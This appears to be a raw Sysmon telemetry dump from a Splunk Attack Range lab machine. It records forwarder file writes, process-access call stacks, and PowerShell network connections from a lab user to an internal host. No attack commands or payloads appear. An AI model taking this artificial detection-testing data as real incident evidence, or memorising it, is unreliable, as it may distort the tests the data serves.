Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.079{B81B27B7-8283-613A-B096-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:12.558{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4AD7CFA7C37C8F8EDD1375F5BE6DCD3,SHA256=1EE2687E1F2AF438177C18786E8BF9F64B26D4D98C57939FB3E5B7D632E0F8C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:13.992{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3C9FEA9DBA69A89A105589791D35AADB,SHA256=373F837227033043FD49CAD8A8E0DCFA42C7B48E55F54E8EF1DC59590F7CAFAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:13.577{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E5513B14D3123975CDB5E33705AE191,SHA256=B679FA4955CDB49751B826FB3487603EC2E9BE6B2104304217ACA6B2C336D676,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:14.607{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1B7DF2C9F2BC7591D3B4369F6973530,SHA256=1EE507237C335695A14713C13F909D5E7C736256E32F25E004BA55A65FE94C4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:38.435{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62039-false10.0.1.12-8000- 23542300x800000000000000035127527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:15.637{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5BFC8C7D588E6CCF280A7BFF5C4BE8D,SHA256=BC3AB6DD18CFC20EC8DCAF2AAB863BB76C98450DC01C4BA456D8BB017E3FE1B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:39.088{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62040-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:16.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B63C01CF07EB298B6CFB0C1EA068FE9,SHA256=870B5CC5619A776E116DD80CD29E56FEF422A561C6923922618EA4C2B3AE688D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:17.673{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8CD21202152A6F2028481BDA756E660,SHA256=33AF747A9DF5F237FC7F4489AB283F1A2018002194F4DB9DCEF2987AA8BADB1D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:18.734{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC268FFFBD1E81A2569C7F94C2D4A92F,SHA256=AB654E09B5B5994A0EA548F9A77D04F7F1A181674D0332FA3396D820D69587CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:19.751{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=838AC0FE88BC741C2CADE1287DDA78CB,SHA256=EAEB628256CE1663F68FB2F42FBD5C39D8ADF8D887CCE834B5BE7E1038367E05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:20.770{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96E04A64D684A9CC82D4B61788974AF6,SHA256=AED3ADC8967150AE9A14ADAD17D1A05BDE78E5D440761B17405F98E77E23F8C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:44.297{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62041-false10.0.1.12-8000- 23542300x800000000000000035127532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:20.153{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B6A62745767B28B760995F038C569C61,SHA256=806095F256C75256738316B37055E64BE817B923A44EC07503815C0AA25E2BEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:21.800{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B6EB419EF969B88F9379E9043F897E3,SHA256=2F411C76E2BEC591C5C82E5843593139D7F9F903CD7DD993893E39A4A1BF8FA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:45.098{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62042-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:22.815{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77F8B18C47E12AD6F9E81680922E99A4,SHA256=ADC082B414C3DD649CD861E5E369EF8066B0E25275F5899BF6F0305D0A8FD28A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:23.846{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EB015ABA7A631700345DD12751661E4,SHA256=F7DBD3A0D9F79C2C3F808422EEFC36D16AD0D7F8642A9F4ACCF5E810BB382D65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:24.950{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B81348FD937E229F63663990E62AF230,SHA256=AE768CC243AF09EC3BEC226AAE9ECCA160BE37C85339062A7AFC1EA7BBF81344,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:24.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ECDAB87B19E350C27ADA53455679173,SHA256=04E716779F3CE331E57290AA4D5FF39BCE732FFCBC48B65AC048A901507F7EB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:49.324{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62043-false10.0.1.12-8000- 23542300x800000000000000035127542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:25.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B38FC3C519A8B948FF839104159755B,SHA256=38CCBDE691021DAE4E7604980EAEAF4A852F1CEF098B5434E22BB51A7C063279,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.880{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8292-613A-B196-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A78343AD503EDE5D41F47B427414088,SHA256=2B9759D6C4FD2B7A9DA06721A273F78D7C6105FB6A96ECFA572C51517E6833E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.880{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.880{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.880{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.880{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.880{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8292-613A-B196-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.880{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8292-613A-B196-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.865{B81B27B7-8292-613A-B196-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035127543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:50.109{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62044-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3865D7ABDC306A176473D1535C407854,SHA256=78C4F450E6E2541D4D36F8F22268629EE5BC85C31214EFA357FA997DA558963D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=46FEE6ACE25B2B5E178EC0CC168D4EB6,SHA256=1D9BF44FEC0C5636336B7F35F4018F5571F64091F172F329B27FBFBFF7C30689,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA7CFD29983ECB950709471358CAD4F2,SHA256=A9592EDA787EB32393391D2BCE36C7CC72B3F507CC42D547D74E9E0C981D64DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.747{B81B27B7-8293-613A-B296-03000000C801}15841400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.579{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8293-613A-B296-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.579{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.579{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:27.579{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 